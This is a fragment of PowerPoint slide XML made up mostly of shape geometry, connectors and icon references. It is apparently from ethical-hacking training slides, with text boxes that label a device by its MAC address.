                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="489" y="527"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="489" y="13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 w="6350" cap="flat" cmpd="sng">
                  <a:solidFill>
                    <a:srgbClr val="00B0F0"/>
                  </a:solidFill>
                  <a:prstDash val="solid"/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61" name="Group 138">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84ED45F0-B90D-47A5-93C5-A9A1BA17E8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13" y="1917"/>
                <a:ext cx="140" cy="38"/>
                <a:chOff x="630" y="1615"/>
                <a:chExt cx="659" cy="177"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="862" name="Freeform 139">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8853DA8B-965B-4627-9CBF-DBBF375222F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0" y="1615"/>
                  <a:ext cx="659" cy="177"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 659"/>
                    <a:gd name="T1" fmla="*/ 55 h 177"/>
                    <a:gd name="T2" fmla="*/ 208 w 659"/>
                    <a:gd name="T3" fmla="*/ 0 h 177"/>
                    <a:gd name="T4" fmla="*/ 659 w 659"/>
                    <a:gd name="T5" fmla="*/ 123 h 177"/>
                    <a:gd name="T6" fmla="*/ 451 w 659"/>
                    <a:gd name="T7" fmla="*/ 177 h 177"/>
                    <a:gd name="T8" fmla="*/ 0 w 659"/>
                    <a:gd name="T9" fmla="*/ 55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59" h="177">
                      <a:moveTo>
                        <a:pt x="0" y="55"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="208" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="659" y="123"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="451" y="177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863" name="Freeform 140">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31C278FE-3CCB-43B5-92E2-8AD1B35FAC4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92" y="1632"/>
                  <a:ext cx="519" cy="139"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 519"/>
                    <a:gd name="T1" fmla="*/ 38 h 139"/>
                    <a:gd name="T2" fmla="*/ 382 w 519"/>
                    <a:gd name="T3" fmla="*/ 139 h 139"/>
                    <a:gd name="T4" fmla="*/ 519 w 519"/>
                    <a:gd name="T5" fmla="*/ 101 h 139"/>
                    <a:gd name="T6" fmla="*/ 134 w 519"/>
                    <a:gd name="T7" fmla="*/ 0 h 139"/>
                    <a:gd name="T8" fmla="*/ 0 w 519"/>
                    <a:gd name="T9" fmla="*/ 38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9" h="139">
                      <a:moveTo>
                        <a:pt x="0" y="38"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="382" y="139"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="519" y="101"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="134" y="0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6350" cap="flat" cmpd="sng">
                  <a:solidFill>
                    <a:srgbClr val="0C080C"/>
                  </a:solidFill>
                  <a:prstDash val="solid"/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60" name="Group 159">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF2CE9BB-B8B5-43B1-BF8D-5600F5E42C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7304" y="3936896"/>
              <a:ext cx="247650" cy="382588"/>
              <a:chOff x="3816" y="2105"/>
              <a:chExt cx="156" cy="241"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="854" name="Freeform 160">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22563106-2B08-4816-A07B-8F72AA7F9E1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66" y="2249"/>
                <a:ext cx="66" cy="86"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 108 w 108"/>
                  <a:gd name="T1" fmla="*/ 36 h 140"/>
                  <a:gd name="T2" fmla="*/ 108 w 108"/>
                  <a:gd name="T3" fmla="*/ 35 h 140"/>
                  <a:gd name="T4" fmla="*/ 108 w 108"/>
                  <a:gd name="T5" fmla="*/ 28 h 140"/>
                  <a:gd name="T6" fmla="*/ 108 w 108"/>
                  <a:gd name="T7" fmla="*/ 23 h 140"/>
                  <a:gd name="T8" fmla="*/ 108 w 108"/>
                  <a:gd name="T9" fmla="*/ 22 h 140"/>
                  <a:gd name="T10" fmla="*/ 108 w 108"/>
                  <a:gd name="T11" fmla="*/ 17 h 140"/>
                  <a:gd name="T12" fmla="*/ 108 w 108"/>
                  <a:gd name="T13" fmla="*/ 16 h 140"/>
                  <a:gd name="T14" fmla="*/ 108 w 108"/>
                  <a:gd name="T15" fmla="*/ 16 h 140"/>
                  <a:gd name="T16" fmla="*/ 89 w 108"/>
                  <a:gd name="T17" fmla="*/ 7 h 140"/>
                  <a:gd name="T18" fmla="*/ 64 w 108"/>
                  <a:gd name="T19" fmla="*/ 2 h 140"/>
                  <a:gd name="T20" fmla="*/ 57 w 108"/>
                  <a:gd name="T21" fmla="*/ 4 h 140"/>
                  <a:gd name="T22" fmla="*/ 49 w 108"/>
                  <a:gd name="T23" fmla="*/ 6 h 140"/>
                  <a:gd name="T24" fmla="*/ 49 w 108"/>
                  <a:gd name="T25" fmla="*/ 6 h 140"/>
                  <a:gd name="T26" fmla="*/ 0 w 108"/>
                  <a:gd name="T27" fmla="*/ 18 h 140"/>
                  <a:gd name="T28" fmla="*/ 29 w 108"/>
                  <a:gd name="T29" fmla="*/ 47 h 140"/>
                  <a:gd name="T30" fmla="*/ 62 w 108"/>
                  <a:gd name="T31" fmla="*/ 40 h 140"/>
                  <a:gd name="T32" fmla="*/ 62 w 108"/>
                  <a:gd name="T33" fmla="*/ 118 h 140"/>
                  <a:gd name="T34" fmla="*/ 101 w 108"/>
                  <a:gd name="T35" fmla="*/ 129 h 140"/>
                  <a:gd name="T36" fmla="*/ 108 w 108"/>
                  <a:gd name="T37" fmla="*/ 117 h 140"/>
                  <a:gd name="T38" fmla="*/ 108 w 108"/>
                  <a:gd name="T39" fmla="*/ 36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8" h="140">
                    <a:moveTo>
                      <a:pt x="108" y="36"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="108" y="36"/>
                      <a:pt x="108" y="36"/>
                      <a:pt x="108" y="35"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="108" y="33"/>
                      <a:pt x="108" y="30"/>
                      <a:pt x="108" y="28"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="108" y="28"/>
                      <a:pt x="108" y="26"/>
                      <a:pt x="108" y="23"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="108" y="23"/>
                      <a:pt x="108" y="22"/>
                      <a:pt x="108" y="22"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="108" y="21"/>
                      <a:pt x="108" y="19"/>
                      <a:pt x="108" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="108" y="17"/>
                      <a:pt x="108" y="17"/>
                      <a:pt x="108" y="16"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="108" y="16"/>
                      <a:pt x="108" y="16"/>
                      <a:pt x="108" y="16"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="105" y="4"/>
                      <a:pt x="95" y="8"/>
                      <a:pt x="89" y="7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="6"/>
                      <a:pt x="73" y="0"/>
                      <a:pt x="64" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="60" y="3"/>
                      <a:pt x="57" y="4"/>
                      <a:pt x="57" y="4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67"/>
                      <a:pt x="62" y="109"/>
                      <a:pt x="62" y="118"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="138"/>
                      <a:pt x="89" y="140"/>
                      <a:pt x="101" y="129"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="105" y="126"/>
                      <a:pt x="108" y="122"/>
                      <a:pt x="108" y="117"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="108" y="101"/>
                      <a:pt x="107" y="69"/>
                      <a:pt x="108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5" name="Freeform 161">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{824D541F-A050-41C3-915C-37F9A6CDB08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41" y="2243"/>
                <a:ext cx="121" cy="103"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 196 w 197"/>
                  <a:gd name="T1" fmla="*/ 44 h 167"/>
                  <a:gd name="T2" fmla="*/ 196 w 197"/>
                  <a:gd name="T3" fmla="*/ 37 h 167"/>
                  <a:gd name="T4" fmla="*/ 177 w 197"/>
                  <a:gd name="T5" fmla="*/ 18 h 167"/>
                  <a:gd name="T6" fmla="*/ 137 w 197"/>
                  <a:gd name="T7" fmla="*/ 25 h 167"/>
                  <a:gd name="T8" fmla="*/ 99 w 197"/>
                  <a:gd name="T9" fmla="*/ 35 h 167"/>
                  <a:gd name="T10" fmla="*/ 99 w 197"/>
                  <a:gd name="T11" fmla="*/ 52 h 167"/>
                  <a:gd name="T12" fmla="*/ 99 w 197"/>
                  <a:gd name="T13" fmla="*/ 35 h 167"/>
                  <a:gd name="T14" fmla="*/ 99 w 197"/>
                  <a:gd name="T15" fmla="*/ 35 h 167"/>
                  <a:gd name="T16" fmla="*/ 99 w 197"/>
                  <a:gd name="T17" fmla="*/ 2 h 167"/>
                  <a:gd name="T18" fmla="*/ 89 w 197"/>
                  <a:gd name="T19" fmla="*/ 14 h 167"/>
                  <a:gd name="T20" fmla="*/ 2 w 197"/>
                  <a:gd name="T21" fmla="*/ 8 h 167"/>
                  <a:gd name="T22" fmla="*/ 2 w 197"/>
                  <a:gd name="T23" fmla="*/ 10 h 167"/>
                  <a:gd name="T24" fmla="*/ 2 w 197"/>
                  <a:gd name="T25" fmla="*/ 31 h 167"/>
                  <a:gd name="T26" fmla="*/ 12 w 197"/>
                  <a:gd name="T27" fmla="*/ 67 h 167"/>
                  <a:gd name="T28" fmla="*/ 70 w 197"/>
                  <a:gd name="T29" fmla="*/ 83 h 167"/>
                  <a:gd name="T30" fmla="*/ 83 w 197"/>
                  <a:gd name="T31" fmla="*/ 82 h 167"/>
                  <a:gd name="T32" fmla="*/ 149 w 197"/>
                  <a:gd name="T33" fmla="*/ 65 h 167"/>
                  <a:gd name="T34" fmla="*/ 150 w 197"/>
                  <a:gd name="T35" fmla="*/ 137 h 167"/>
                  <a:gd name="T36" fmla="*/ 150 w 197"/>
                  <a:gd name="T37" fmla="*/ 141 h 167"/>
                  <a:gd name="T38" fmla="*/ 197 w 197"/>
                  <a:gd name="T39" fmla="*/ 140 h 167"/>
                  <a:gd name="T40" fmla="*/ 196 w 197"/>
                  <a:gd name="T41" fmla="*/ 4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7" h="167">
                    <a:moveTo>
                      <a:pt x="196" y="44"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="196" y="44"/>
                      <a:pt x="196" y="40"/>
                      <a:pt x="196" y="37"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="193" y="23"/>
                      <a:pt x="183" y="19"/>
                      <a:pt x="177" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="168" y="17"/>
                      <a:pt x="137" y="25"/>
                      <a:pt x="137" y="2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20"/>
                      <a:pt x="99" y="4"/>
                      <a:pt x="99" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="98" y="8"/>
                      <a:pt x="95" y="13"/>
                      <a:pt x="89" y="14"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="80" y="16"/>
                      <a:pt x="0" y="0"/>
                      <a:pt x="2" y="8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55"/>
                      <a:pt x="0" y="64"/>
                      <a:pt x="12" y="67"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="18" y="69"/>
                      <a:pt x="66" y="82"/>
                      <a:pt x="70" y="83"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="83"/>
                      <a:pt x="78" y="84"/>
                      <a:pt x="83" y="82"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="97" y="78"/>
                      <a:pt x="127" y="71"/>
                      <a:pt x="149" y="65"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="150" y="137"/>
                      <a:pt x="150" y="137"/>
                      <a:pt x="150" y="137"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="150" y="138"/>
                      <a:pt x="150" y="140"/>
                      <a:pt x="150" y="141"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="151" y="167"/>
                      <a:pt x="196" y="163"/>
                      <a:pt x="197" y="140"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="196" y="125"/>
                      <a:pt x="196" y="60"/>
                      <a:pt x="196" y="44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6" name="Freeform 162">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EACDFDA8-33BA-4AB1-8DEE-FCEE48AA7B8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16" y="2150"/>
                <a:ext cx="156" cy="122"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 209 w 254"/>
                  <a:gd name="T1" fmla="*/ 119 h 200"/>
                  <a:gd name="T2" fmla="*/ 184 w 254"/>
                  <a:gd name="T3" fmla="*/ 127 h 200"/>
                  <a:gd name="T4" fmla="*/ 173 w 254"/>
                  <a:gd name="T5" fmla="*/ 55 h 200"/>
                  <a:gd name="T6" fmla="*/ 144 w 254"/>
                  <a:gd name="T7" fmla="*/ 27 h 200"/>
                  <a:gd name="T8" fmla="*/ 96 w 254"/>
                  <a:gd name="T9" fmla="*/ 14 h 200"/>
                  <a:gd name="T10" fmla="*/ 51 w 254"/>
                  <a:gd name="T11" fmla="*/ 2 h 200"/>
                  <a:gd name="T12" fmla="*/ 18 w 254"/>
                  <a:gd name="T13" fmla="*/ 13 h 200"/>
                  <a:gd name="T14" fmla="*/ 3 w 254"/>
                  <a:gd name="T15" fmla="*/ 96 h 200"/>
                  <a:gd name="T16" fmla="*/ 3 w 254"/>
                  <a:gd name="T17" fmla="*/ 96 h 200"/>
                  <a:gd name="T18" fmla="*/ 2 w 254"/>
                  <a:gd name="T19" fmla="*/ 99 h 200"/>
                  <a:gd name="T20" fmla="*/ 2 w 254"/>
                  <a:gd name="T21" fmla="*/ 99 h 200"/>
                  <a:gd name="T22" fmla="*/ 9 w 254"/>
                  <a:gd name="T23" fmla="*/ 118 h 200"/>
                  <a:gd name="T24" fmla="*/ 26 w 254"/>
                  <a:gd name="T25" fmla="*/ 119 h 200"/>
                  <a:gd name="T26" fmla="*/ 33 w 254"/>
                  <a:gd name="T27" fmla="*/ 117 h 200"/>
                  <a:gd name="T28" fmla="*/ 33 w 254"/>
                  <a:gd name="T29" fmla="*/ 117 h 200"/>
                  <a:gd name="T30" fmla="*/ 36 w 254"/>
                  <a:gd name="T31" fmla="*/ 116 h 200"/>
                  <a:gd name="T32" fmla="*/ 43 w 254"/>
                  <a:gd name="T33" fmla="*/ 114 h 200"/>
                  <a:gd name="T34" fmla="*/ 44 w 254"/>
                  <a:gd name="T35" fmla="*/ 76 h 200"/>
                  <a:gd name="T36" fmla="*/ 41 w 254"/>
                  <a:gd name="T37" fmla="*/ 77 h 200"/>
                  <a:gd name="T38" fmla="*/ 44 w 254"/>
                  <a:gd name="T39" fmla="*/ 53 h 200"/>
                  <a:gd name="T40" fmla="*/ 43 w 254"/>
                  <a:gd name="T41" fmla="*/ 171 h 200"/>
                  <a:gd name="T42" fmla="*/ 53 w 254"/>
                  <a:gd name="T43" fmla="*/ 183 h 200"/>
                  <a:gd name="T44" fmla="*/ 111 w 254"/>
                  <a:gd name="T45" fmla="*/ 199 h 200"/>
                  <a:gd name="T46" fmla="*/ 140 w 254"/>
                  <a:gd name="T47" fmla="*/ 177 h 200"/>
                  <a:gd name="T48" fmla="*/ 140 w 254"/>
                  <a:gd name="T49" fmla="*/ 171 h 200"/>
                  <a:gd name="T50" fmla="*/ 140 w 254"/>
                  <a:gd name="T51" fmla="*/ 139 h 200"/>
                  <a:gd name="T52" fmla="*/ 139 w 254"/>
                  <a:gd name="T53" fmla="*/ 98 h 200"/>
                  <a:gd name="T54" fmla="*/ 137 w 254"/>
                  <a:gd name="T55" fmla="*/ 84 h 200"/>
                  <a:gd name="T56" fmla="*/ 136 w 254"/>
                  <a:gd name="T57" fmla="*/ 79 h 200"/>
                  <a:gd name="T58" fmla="*/ 137 w 254"/>
                  <a:gd name="T59" fmla="*/ 84 h 200"/>
                  <a:gd name="T60" fmla="*/ 139 w 254"/>
                  <a:gd name="T61" fmla="*/ 98 h 200"/>
                  <a:gd name="T62" fmla="*/ 145 w 254"/>
                  <a:gd name="T63" fmla="*/ 136 h 200"/>
                  <a:gd name="T64" fmla="*/ 145 w 254"/>
                  <a:gd name="T65" fmla="*/ 137 h 200"/>
                  <a:gd name="T66" fmla="*/ 145 w 254"/>
                  <a:gd name="T67" fmla="*/ 137 h 200"/>
                  <a:gd name="T68" fmla="*/ 145 w 254"/>
                  <a:gd name="T69" fmla="*/ 142 h 200"/>
                  <a:gd name="T70" fmla="*/ 155 w 254"/>
                  <a:gd name="T71" fmla="*/ 165 h 200"/>
                  <a:gd name="T72" fmla="*/ 170 w 254"/>
                  <a:gd name="T73" fmla="*/ 171 h 200"/>
                  <a:gd name="T74" fmla="*/ 223 w 254"/>
                  <a:gd name="T75" fmla="*/ 155 h 200"/>
                  <a:gd name="T76" fmla="*/ 209 w 254"/>
                  <a:gd name="T77" fmla="*/ 119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4" h="200">
                    <a:moveTo>
                      <a:pt x="209" y="119"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="207" y="121"/>
                      <a:pt x="197" y="123"/>
                      <a:pt x="184" y="127"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="179" y="94"/>
                      <a:pt x="175" y="64"/>
                      <a:pt x="173" y="55"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="170" y="36"/>
                      <a:pt x="153" y="30"/>
                      <a:pt x="144" y="27"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="136" y="23"/>
                      <a:pt x="110" y="18"/>
                      <a:pt x="96" y="14"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="83" y="10"/>
                      <a:pt x="61" y="4"/>
                      <a:pt x="51" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="0"/>
                      <a:pt x="21" y="4"/>
                      <a:pt x="18" y="13"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="16" y="16"/>
                      <a:pt x="10" y="56"/>
                      <a:pt x="3" y="96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0" y="109"/>
                      <a:pt x="4" y="116"/>
                      <a:pt x="9" y="118"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="121"/>
                      <a:pt x="20" y="120"/>
                      <a:pt x="26" y="119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34" y="117"/>
                      <a:pt x="35" y="117"/>
                      <a:pt x="36" y="116"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="116"/>
                      <a:pt x="41" y="115"/>
                      <a:pt x="43" y="114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3" y="76"/>
                      <a:pt x="42" y="77"/>
                      <a:pt x="41" y="77"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="43" y="60"/>
                      <a:pt x="44" y="49"/>
                      <a:pt x="44" y="53"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="44" y="59"/>
                      <a:pt x="43" y="123"/>
                      <a:pt x="43" y="171"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="44" y="177"/>
                      <a:pt x="47" y="182"/>
                      <a:pt x="53" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="186"/>
                      <a:pt x="102" y="197"/>
                      <a:pt x="111" y="199"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="200"/>
                      <a:pt x="138" y="190"/>
                      <a:pt x="140" y="177"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="140" y="175"/>
                      <a:pt x="140" y="173"/>
                      <a:pt x="140" y="171"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="140" y="139"/>
                      <a:pt x="140" y="139"/>
                      <a:pt x="140" y="139"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="140" y="124"/>
                      <a:pt x="140" y="111"/>
                      <a:pt x="139" y="98"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="138" y="92"/>
                      <a:pt x="137" y="87"/>
                      <a:pt x="137" y="84"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="136" y="82"/>
                      <a:pt x="136" y="80"/>
                      <a:pt x="136" y="79"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="136" y="80"/>
                      <a:pt x="136" y="82"/>
                      <a:pt x="137" y="84"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="138" y="88"/>
                      <a:pt x="138" y="93"/>
                      <a:pt x="139" y="98"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="140" y="108"/>
                      <a:pt x="142" y="120"/>
                      <a:pt x="145" y="136"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="145" y="136"/>
                      <a:pt x="145" y="137"/>
                      <a:pt x="145" y="137"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="145" y="137"/>
                      <a:pt x="145" y="137"/>
                      <a:pt x="145" y="137"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="145" y="142"/>
                      <a:pt x="145" y="142"/>
                      <a:pt x="145" y="142"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="148" y="154"/>
                      <a:pt x="151" y="161"/>
                      <a:pt x="155" y="165"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="159" y="169"/>
                      <a:pt x="164" y="170"/>
                      <a:pt x="170" y="171"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="186" y="167"/>
                      <a:pt x="204" y="161"/>
                      <a:pt x="223" y="155"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="254" y="147"/>
                      <a:pt x="236" y="110"/>
                      <a:pt x="209" y="11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50000">
                    <a:schemeClr val="bg1">
                      <a:gamma/>
                      <a:shade val="85882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7" name="Freeform 163">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EBDE4552-4108-420F-9FB6-F374E29AB98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51" y="2143"/>
                <a:ext cx="41" cy="25"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 30 w 66"/>
                  <a:gd name="T1" fmla="*/ 39 h 41"/>
                  <a:gd name="T2" fmla="*/ 10 w 66"/>
                  <a:gd name="T3" fmla="*/ 23 h 41"/>
                  <a:gd name="T4" fmla="*/ 16 w 66"/>
                  <a:gd name="T5" fmla="*/ 13 h 41"/>
                  <a:gd name="T6" fmla="*/ 54 w 66"/>
                  <a:gd name="T7" fmla="*/ 16 h 41"/>
                  <a:gd name="T8" fmla="*/ 57 w 66"/>
                  <a:gd name="T9" fmla="*/ 29 h 41"/>
                  <a:gd name="T10" fmla="*/ 30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30" y="39"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="37"/>
                      <a:pt x="0" y="25"/>
                      <a:pt x="10" y="23"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="17" y="21"/>
                      <a:pt x="13" y="16"/>
                      <a:pt x="16" y="13"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="18" y="10"/>
                      <a:pt x="54" y="0"/>
                      <a:pt x="54" y="16"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="21"/>
                      <a:pt x="47" y="25"/>
                      <a:pt x="57" y="29"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="33"/>
                      <a:pt x="46" y="41"/>
                      <a:pt x="30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8" name="Oval 164">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5083F61-A174-498D-A005-70ED992406D4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 flipH="1">
                <a:off x="3846" y="2105"/>
                <a:ext cx="54" cy="54"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ln w="6350" algn="ctr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pic>
          <p:nvPicPr>
            <p:cNvPr id="661" name="Picture 13" descr="Y:\CEH v7 - Haja\Icon Shock\CLEAN\Networking\wireless_router_256.png">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{127E8988-BFD0-4ADC-9B3B-ADB3FD0020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06756" y="4931050"/>
              <a:ext cx="599200" cy="599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62" name="Rectangle 661">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{119A3E72-4099-465E-85A4-905DF339C8A8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3498790" y="2329356"/>
              <a:ext cx="1879719" cy="46166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Device with MAC address: 00-0C-F1-56-98-AD</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="663" name="Picture 5" descr="X:\Web2.0 PNG Icons\Speech Bubbles\Bubble3.png">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE9A2B34-4C35-4885-9D86-72D810B98B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 flipV="1">
              <a:off x="3098933" y="5011320"/>
              <a:ext cx="1085505" cy="105022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7F55DA33-A394-4986-B847-8A4948E5125B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3185370" y="5245237"/>
              <a:ext cx="962951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 am MAC 00-0C-F1-56-98-AD</a:t>
              </a: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665" name="Straight Arrow Connector 664">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F31AE63-948A-4ABB-87C6-6179F41C8C8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591868" y="4238277"/>
              <a:ext cx="5100092" cy="722210"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="38100">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:prstDash val="sysDot"/>
              <a:headEnd type="arrow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66" name="Group 665">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A7B2866-D72E-4B42-8BA3-8F8754FA27EA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6843518" y="1200192"/>
              <a:ext cx="281470" cy="465165"/>
              <a:chOff x="5870574" y="2092325"/>
              <a:chExt cx="301626" cy="498475"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="852" name="Freeform 911">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
